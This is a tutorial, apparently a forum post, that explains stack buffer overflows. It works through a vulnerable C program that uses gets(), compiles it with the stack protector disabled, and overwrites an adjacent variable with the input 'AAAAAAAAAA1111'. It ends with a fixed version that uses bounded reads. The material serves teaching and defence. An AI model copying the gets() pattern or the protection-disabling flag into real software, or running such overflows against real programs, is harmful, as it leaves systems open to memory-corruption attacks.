Stack is a Last In First Out (LIFO) abstract data structure. The stack is used as the main data structure for processing and data management on most OS architectures, such as Intel x86.

Stack based overflows

A stack based overflow happens when too much data is written to the call stack and overwrites neighbouring data. The call stack is a limited amount of memory, often fixed at the start of the program. When a program tries to write more data than the space set aside for it on the call stack, the result is an overflow.

Why it is dangerous

It is dangerous because the call stack contains all our data (declarations), including the buffers used for user input. For example, if we declare:

Code:
char pass[] = "I am the password!!!";
int i = 0;
char userInput[10];

Then the stack would look like this:

Code:
=============
| userInput |
-------------
| int i = 0 |
-------------
| char pass |
=============

Now if we overflow userInput we can overwrite int i with a value of our choosing. It will become clear when we see the exploit example.

Exploiting

Exploit :- buggyProgram.c

Code:
#include <stdio.h>

int main()
{
    int i = 0;
    char userInput[10];

    printf("Please enter some data : ");
    gets(userInput); /* deprecated function; now you will get to know why we should not use this... */

    if (i == 0x31313131) {   /* 0x31 is the ASCII code of '1' */
        printf("You !!!! Just exploited me.. Aah! :( :'(\n");
    }
    return 0;
}

Compiling :-

We compile with gcc and the no-stack-protector flag so that the compiler's stack protector (canary check) does not stop us:

Code:
aneesh@aneesh-laptop:~/articles/C$ gcc buggyProgram.c -fno-stack-protector -o buggyProgram
/tmp/ccORWe40.o: In function `main':
buggyProgram.c:(.text+0x26): warning: the `gets' function is dangerous and should not be used.
aneesh@aneesh-laptop:~/articles/C$

Let's exploit it now....

Let's create an attack string first. As we know, userInput is just 10 bytes long. Thus, in order to exploit this, we need to pass 10 bytes to fill it, and then four '1' characters (0x31 each) to overwrite the int i variable with 0x31313131.
Attack string :-

Code:
[10 bytes garbage] + [4 * '1']
        |                |
   for filling      for overwriting
   up userInput     the int i variable

Now let's pass this to the program and see what happens..

Code:
aneesh@aneesh-laptop:~/articles/C$ ./buggyProgram
Please enter some data : AAAAAAAAAA1111
You !!!! Just exploited me.. Aah! :( :'(

And BooM!! We did it!!!
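As an added example (my own code, not part of the original post), here is the fix side of the same program: the unbounded gets() call is replaced by a bounded copy, so the trailing "1111" of the attack string is discarded instead of landing on top of i. The names bounded_copy, sentinel_clobbered and INPUT_SIZE are mine; the 10-byte buffer and the 0x31313131 check are taken from buggyProgram.c.

```c
#include <stdio.h>
#include <string.h>

#define INPUT_SIZE 10   /* same 10-byte buffer as buggyProgram.c */

/* Bounded replacement for gets(): copy at most dst_size-1 bytes of src into
 * dst and always NUL-terminate. Returns how many input bytes were dropped,
 * so the caller can tell that the input was truncated rather than silently
 * losing it. */
size_t bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    size_t keep = (len < dst_size - 1) ? len : dst_size - 1;
    memcpy(dst, src, keep);
    dst[keep] = '\0';
    return len - keep;
}

/* Same local layout as main() in buggyProgram.c, but the input goes through
 * bounded_copy(). Returns 1 if the sentinel i ended up as 0x31313131, which is
 * what "AAAAAAAAAA1111" produced against the gets() version; with the bounded
 * copy it stays 0 no matter how long the input is. */
int sentinel_clobbered(const char *input)
{
    volatile int i = 0;              /* the variable the original overflow hit */
    char userInput[INPUT_SIZE];
    bounded_copy(userInput, sizeof userInput, input);
    return i == 0x31313131;
}

/* Interactive version: fgets() reads at most sizeof(buf)-1 bytes, so the
 * remainder of an over-long line stays in stdin and never reaches the stack. */
int main(void)
{
    char userInput[INPUT_SIZE];
    printf("Please enter some data : ");
    if (fgets(userInput, sizeof userInput, stdin) == NULL)
        return 1;
    userInput[strcspn(userInput, "\n")] = '\0';   /* strip the newline, if any */
    printf("Stored \"%s\" (%zu of %d bytes allowed)\n",
           userInput, strlen(userInput), INPUT_SIZE - 1);
    return 0;
}
```

One caveat worth knowing: fgets() does not consume the bytes it could not fit, so a second read from stdin would pick up the leftover "1111". That is harmless here, but in a loop it is the usual reason a bounded read appears to "see" input the user never typed on that turn.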